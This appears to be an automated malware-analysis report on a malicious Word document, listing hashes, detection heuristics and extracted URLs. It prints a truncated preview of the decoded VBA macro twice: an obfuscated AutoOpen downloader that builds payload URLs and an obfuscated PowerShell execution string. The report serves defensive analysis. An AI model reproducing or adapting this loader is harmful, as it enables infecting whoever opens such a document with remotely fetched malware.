Office (OLE) malware analysis — malicious · 43e7bcef39f88ca7

MALICIOUS

Office (OLE)

146.0 KB Created: 2018-01-05 13:58:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: 9715ce865dcdc64ab717378be5378046 SHA-1: 52aeefc43f1bbfcb34c10b825665bb8f63d3edc3 SHA-256: 43e7bcef39f88ca7d3b9b67d09f9264c4946e0e12a337c23e043bb8e9f634c2e

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function within its VBA macros. The AutoOpen macro is present and obfuscated, designed to execute a payload. The reconstructed URL 'http://www.wilalardwig.com/wp-content/aeHbXw,htps://' is likely the download location for a second-stage payload, which is then executed.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wAiZ+AiZwwJqT+JqT.kickAiZ+AiZassgrowthAiZ+AiZ.com/AiJqT+JqTZ+AiZLAiZ+AiZjzmE/,AiZ+S77L1bRKBsj0bClIT In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45356 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45356 bytes
SHA-256: `de1f2439d68bff8eed4d067da745e5e7cb370a9ad00e67bea39a4281aa7159d0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "kXLSrVOADK" Sub AutoOpen() On Error Resume Next mWNHULLJi = 8 + CDbl(wtdOiqCnY) / (oBYOshl + ChrB(WBCavVzW / ChrW(847) * ZpYndOdviAkJQs - Sgn(342))) NdtjkzwOm = 8 + CDbl(zmhOXzHQHtd) / (AQKnvTJhBCGIpw + ChrB(lNYwKCz / ChrW(847) * rhPXksTBWOOdc - Sgn(342))) ZzCiFFZwj = 8 + CDbl(ZavVDjvTwC) / (TFjvZohBjta + ChrB(ZMPWTFwYr / ChrW(847) * JqzoWPSb - Sgn(342))) vSaAFrWjf = 8 + CDbl(rvwiwHWJo) / (bOzilIwq + ChrB(kSSjIwHsYGXAkZ / ChrW(847) * jvOirpSNaFz - Sgn(342))) Application.Run "pGQTUrJETvktWG", mXoAAPjlvSwt hSwPzufkv = 8 + CDbl(YLojqPzCQMqoTz) / (uSwIRFriIQpvJ + ChrB(cUAdiHjZ / ChrW(847) * AaVKKsJszwZCch - Sgn(342))) bisjhfQBT = 8 + CDbl(tnsqLlqFUUwiw) / (hmzXqzkGAnYzpb + ChrB(uhzHhQW / ChrW(847) * ShNIUiIithzzvj - Sgn(342))) sLVDnnFRL = 8 + CDbl(PDamzaOiLmjpco) / (YrEfSrbGO + ChrB(nliditAWRtQHV / ChrW(847) * SSSnIzDihnOv - Sgn(342))) BmtEnwLzL = 8 + CDbl(kBctfTLvzQVVM) / (YozPlFEqOmsOcM + ChrB(TwYXdhR / ChrW(847) * PTjXlowa - Sgn(342))) End Sub Function mXoAAPjlvSwt() On Error Resume Next tBRpDnj = ("CSFSbwkEBjotocAiZ+AiZlubfojeteiros.comAiZ+'+'JqT+'+'JqTAiZ/wp-contAiZ+AiZent/aeHAi'+'Z+AiZwbX/AiZ+AiZ'+',ht'+'tp:Ai'+'Z+AiZ/AiZ+AiZ/AiZ+AiZwwwAiZ+AiZ.AiZ+AiZ'+'wilAiZ+AiZlaAiZ+AiZrdwigAiZ+AiJqT+JqTZanmbeAiZOQfRY") NFblo = 8 + CDbl(LrzzKNEj) / (kZzftXLtRswHJ + ChrB(PRREQpJcQd / ChrW(847) * XCzwjTWNshsk - Sgn(342))) OHTAnwa = Mid(tBRpDnj, 11, 196) GwGaTUkM = 8 + CDbl(RrDRwsGFBXhft) / (oqfIJTvV + ChrB(LvkZctRnWh / ChrW(847) * nZlrfXXfWiS - Sgn(342))) zlTnAUjjm = ("lhCN94aPChSs5ingateave.coAiZ+AiZm.aJqT+JqTAiZ+AiZu/JqT+JqTjhBB/,httAiZ+9GjdA4GpX5LR7dk6MNpzzX") UkzIXFAuF = 8 + CDbl(TDtUmuHTWn) / (SYwwUfwfw + ChrB(PEjofVXikiLLR / ChrW(847) * iDvNvmJa - Sgn(342))) swoqEpYrEnL = Mid(zlTnAUjjm, 14, 58) BuKGjp = 8 + CDbl(bEfSqvBvXud) / (zJfGYjl + ChrB(IHGHmNRjijMj / ChrW(847) * bHkzDjnijnQoF - Sgn(342))) YicAIs = ("M5Sn9KAiZ+AiZsadasd JqT+JqT='+'AiZ+AiZ AiZ+'+'AiZnew-oAiZ+AiZbjJqT+JqTect '+'random;g'+'AiZ+AiZrTbcd = AiZ+AiZHpQhttp://wAiZ+AiZwwJqT+JqT.kickAiZ+AiZassgrowthAiZ+AiZ.com/AiJqT+JqTZ+AiZLAiZ+AiZjzmE/,AiZ+S77L1bRKBsj0bClIT") ODdsm = 8 + CDbl(JPXziuq) / (rUzBzZkv + ChrB(HFzwFwj / ChrW(847) * XjPPOJfwwpo - Sgn(342))) zNmFdhFtz = Mid(YicAIs, 7, 196) dPfOWWdC = 8 + CDbl(THYqShz) / (LKlPMmiVXFD + ChrB(nXKLbwcKT / ChrW(847) * AkwthAh - Sgn(342))) SkaqHQuYkO = ("DYpUEEBm3qziL9Odk8VIjpvnMW+AiZ.AiZ+AiZcom/mOAp0AiZ+AiZ8AiZJqT+JqT+AiZ/HpQ.Split(HpQ,HpQ);gAiZ+AiZrTkarAiZ+Tr6sYpAm") WMIIUAfiIh = 8 + CDbl(SjGzNbtzfJb) / (zZflETuJ + ChrB(KwIDzjjXB / ChrW(847) * MTFDhpzAnc - Sgn(342))) uzrTC = Mid(SkaqHQuYkO, 27, 80) pAErnm = 8 + CDbl(JBjCAun) / (ZUTPMIkwu + ChrB(vJcdmPntV / ChrW(847) * wETHjNAvcAwlvE - Sgn(342))) qiqhcRMZGw = ("ui& ( $PSHOmE[21]+$PShOmE[30]+'X') ( ('dcSBsNmRmVQnRsbaSX") zRJZPUv = 8 + CDbl(pNFjHAhUtnHV) / (ShFEicuj + ChrB(zpRVSwV / ChrW(847) * mIKJcwIrt - Sgn(342))) pdOlvCTi = Mid(qiqhcRMZGw, 3, 37) fBrNKEhjKz = 8 + CDbl(pOGntknPhIjq) / (QDjPQPm + ChrB(lwfAwKCqlwNl / ChrW(847) * FSzKvhhCONhvE - Sgn(342))) KoFLLQWEkQ = ("48WH4iPv:ComsPUFPubjELTa") vLNYQtzo = 8 + CDbl(qtjUIaWuB) / (hidiCIobqG + ChrB(bVIhMiVZJCEi / ChrW(847) * OAhcofhqcUUZ - Sgn(342))) hrQRfmCGMW = Mid(KoFLLQWEkQ, 8, 7) GUvuAjc = 8 + CDbl(pzzHBbwjOYanws) / (VsTcvtT + ChrB(bLmLYsw / ChrW(847) * nHQtYZB - Sgn(342))) PIDWGWiNwL = ("JUN[chAr]112+[chAr]77+[chAr]104),[String][chAr]124) )SDv79jzpY") nGXmRzmVw = 8 + CDbl(vdPXcBEnMPPjEU) / (NoDZtitV + ChrB(BVDaTsfQ / ChrW(847) * XrBPaAt - Sgn(342))) iQpjidpqkJr = Mid(PIDWGWiNwL, 4, 50) aWfVrXK = 8 + CDbl(iltajVALhjpw) / (QBIEVGwiTU + ChrB(zhjcIzNCfHEH / ChrW(847) * kSACOmIpSiG - Sgn(342))) qzFjwOfFPL = ("6BPfiZpubAiZ+AiZlic EpZ5R77mXjHFTGwt3mi") PHPZa = 8 + CDbl(MiLCmCzWu) / (MsBnzsiEPuDOko + ChrB(NiiMUDOJotRDiZ / ChrW(847) * hcfrCsHUkGOlC - Sgn(342))) zJffsJOPZM = Mid(qzFjwOfFP ... (truncated)

SHA-256: de1f2439d68bff8eed4d067da745e5e7cb370a9ad00e67bea39a4281aa7159d0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kXLSrVOADK"
Sub AutoOpen()
On Error Resume Next
mWNHULLJi = 8 + CDbl(wtdOiqCnY) / (oBYOshl + ChrB(WBCavVzW / ChrW(847) * ZpYndOdviAkJQs - Sgn(342)))
NdtjkzwOm = 8 + CDbl(zmhOXzHQHtd) / (AQKnvTJhBCGIpw + ChrB(lNYwKCz / ChrW(847) * rhPXksTBWOOdc - Sgn(342)))
ZzCiFFZwj = 8 + CDbl(ZavVDjvTwC) / (TFjvZohBjta + ChrB(ZMPWTFwYr / ChrW(847) * JqzoWPSb - Sgn(342)))
vSaAFrWjf = 8 + CDbl(rvwiwHWJo) / (bOzilIwq + ChrB(kSSjIwHsYGXAkZ / ChrW(847) * jvOirpSNaFz - Sgn(342)))
Application.Run "pGQTUrJETvktWG", mXoAAPjlvSwt
hSwPzufkv = 8 + CDbl(YLojqPzCQMqoTz) / (uSwIRFriIQpvJ + ChrB(cUAdiHjZ / ChrW(847) * AaVKKsJszwZCch - Sgn(342)))
bisjhfQBT = 8 + CDbl(tnsqLlqFUUwiw) / (hmzXqzkGAnYzpb + ChrB(uhzHhQW / ChrW(847) * ShNIUiIithzzvj - Sgn(342)))
sLVDnnFRL = 8 + CDbl(PDamzaOiLmjpco) / (YrEfSrbGO + ChrB(nliditAWRtQHV / ChrW(847) * SSSnIzDihnOv - Sgn(342)))
BmtEnwLzL = 8 + CDbl(kBctfTLvzQVVM) / (YozPlFEqOmsOcM + ChrB(TwYXdhR / ChrW(847) * PTjXlowa - Sgn(342)))
End Sub
Function mXoAAPjlvSwt()
On Error Resume Next
tBRpDnj = ("CSFSbwkEBjotocAiZ+AiZlubfojeteiros.comAiZ+'+'JqT+'+'JqTAiZ/wp-contAiZ+AiZent/aeHAi'+'Z+AiZwbX/AiZ+AiZ'+',ht'+'tp:Ai'+'Z+AiZ/AiZ+AiZ/AiZ+AiZwwwAiZ+AiZ.AiZ+AiZ'+'wilAiZ+AiZlaAiZ+AiZrdwigAiZ+AiJqT+JqTZanmbeAiZOQfRY")
NFblo = 8 + CDbl(LrzzKNEj) / (kZzftXLtRswHJ + ChrB(PRREQpJcQd / ChrW(847) * XCzwjTWNshsk - Sgn(342)))
OHTAnwa = Mid(tBRpDnj, 11, 196)
GwGaTUkM = 8 + CDbl(RrDRwsGFBXhft) / (oqfIJTvV + ChrB(LvkZctRnWh / ChrW(847) * nZlrfXXfWiS - Sgn(342)))
zlTnAUjjm = ("lhCN94aPChSs5ingateave.coAiZ+AiZm.aJqT+JqTAiZ+AiZu/JqT+JqTjhBB/,httAiZ+9GjdA4GpX5LR7dk6MNpzzX")
UkzIXFAuF = 8 + CDbl(TDtUmuHTWn) / (SYwwUfwfw + ChrB(PEjofVXikiLLR / ChrW(847) * iDvNvmJa - Sgn(342)))
swoqEpYrEnL = Mid(zlTnAUjjm, 14, 58)
BuKGjp = 8 + CDbl(bEfSqvBvXud) / (zJfGYjl + ChrB(IHGHmNRjijMj / ChrW(847) * bHkzDjnijnQoF - Sgn(342)))
YicAIs = ("M5Sn9KAiZ+AiZsadasd JqT+JqT='+'AiZ+AiZ AiZ+'+'AiZnew-oAiZ+AiZbjJqT+JqTect '+'random;g'+'AiZ+AiZrTbcd = AiZ+AiZHpQhttp://wAiZ+AiZwwJqT+JqT.kickAiZ+AiZassgrowthAiZ+AiZ.com/AiJqT+JqTZ+AiZLAiZ+AiZjzmE/,AiZ+S77L1bRKBsj0bClIT")
ODdsm = 8 + CDbl(JPXziuq) / (rUzBzZkv + ChrB(HFzwFwj / ChrW(847) * XjPPOJfwwpo - Sgn(342)))
zNmFdhFtz = Mid(YicAIs, 7, 196)
dPfOWWdC = 8 + CDbl(THYqShz) / (LKlPMmiVXFD + ChrB(nXKLbwcKT / ChrW(847) * AkwthAh - Sgn(342)))
SkaqHQuYkO = ("DYpUEEBm3qziL9Odk8VIjpvnMW+AiZ.AiZ+AiZcom/mOAp0AiZ+AiZ8AiZJqT+JqT+AiZ/HpQ.Split(HpQ,HpQ);gAiZ+AiZrTkarAiZ+Tr6sYpAm")
WMIIUAfiIh = 8 + CDbl(SjGzNbtzfJb) / (zZflETuJ + ChrB(KwIDzjjXB / ChrW(847) * MTFDhpzAnc - Sgn(342)))
uzrTC = Mid(SkaqHQuYkO, 27, 80)
pAErnm = 8 + CDbl(JBjCAun) / (ZUTPMIkwu + ChrB(vJcdmPntV / ChrW(847) * wETHjNAvcAwlvE - Sgn(342)))
qiqhcRMZGw = ("ui& ( $PSHOmE[21]+$PShOmE[30]+'X') ( ('dcSBsNmRmVQnRsbaSX")
zRJZPUv = 8 + CDbl(pNFjHAhUtnHV) / (ShFEicuj + ChrB(zpRVSwV / ChrW(847) * mIKJcwIrt - Sgn(342)))
pdOlvCTi = Mid(qiqhcRMZGw, 3, 37)
fBrNKEhjKz = 8 + CDbl(pOGntknPhIjq) / (QDjPQPm + ChrB(lwfAwKCqlwNl / ChrW(847) * FSzKvhhCONhvE - Sgn(342)))
KoFLLQWEkQ = ("48WH4iPv:ComsPUFPubjELTa")
vLNYQtzo = 8 + CDbl(qtjUIaWuB) / (hidiCIobqG + ChrB(bVIhMiVZJCEi / ChrW(847) * OAhcofhqcUUZ - Sgn(342)))
hrQRfmCGMW = Mid(KoFLLQWEkQ, 8, 7)
GUvuAjc = 8 + CDbl(pzzHBbwjOYanws) / (VsTcvtT + ChrB(bLmLYsw / ChrW(847) * nHQtYZB - Sgn(342)))
PIDWGWiNwL = ("JUN[chAr]112+[chAr]77+[chAr]104),[String][chAr]124) )SDv79jzpY")
nGXmRzmVw = 8 + CDbl(vdPXcBEnMPPjEU) / (NoDZtitV + ChrB(BVDaTsfQ / ChrW(847) * XrBPaAt - Sgn(342)))
iQpjidpqkJr = Mid(PIDWGWiNwL, 4, 50)
aWfVrXK = 8 + CDbl(iltajVALhjpw) / (QBIEVGwiTU + ChrB(zhjcIzNCfHEH / ChrW(847) * kSACOmIpSiG - Sgn(342)))
qzFjwOfFPL = ("6BPfiZpubAiZ+AiZlic EpZ5R77mXjHFTGwt3mi")
PHPZa = 8 + CDbl(MiLCmCzWu) / (MsBnzsiEPuDOko + ChrB(NiiMUDOJotRDiZ / ChrW(847) * hcfrCsHUkGOlC - Sgn(342)))
zJffsJOPZM = Mid(qzFjwOfFP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.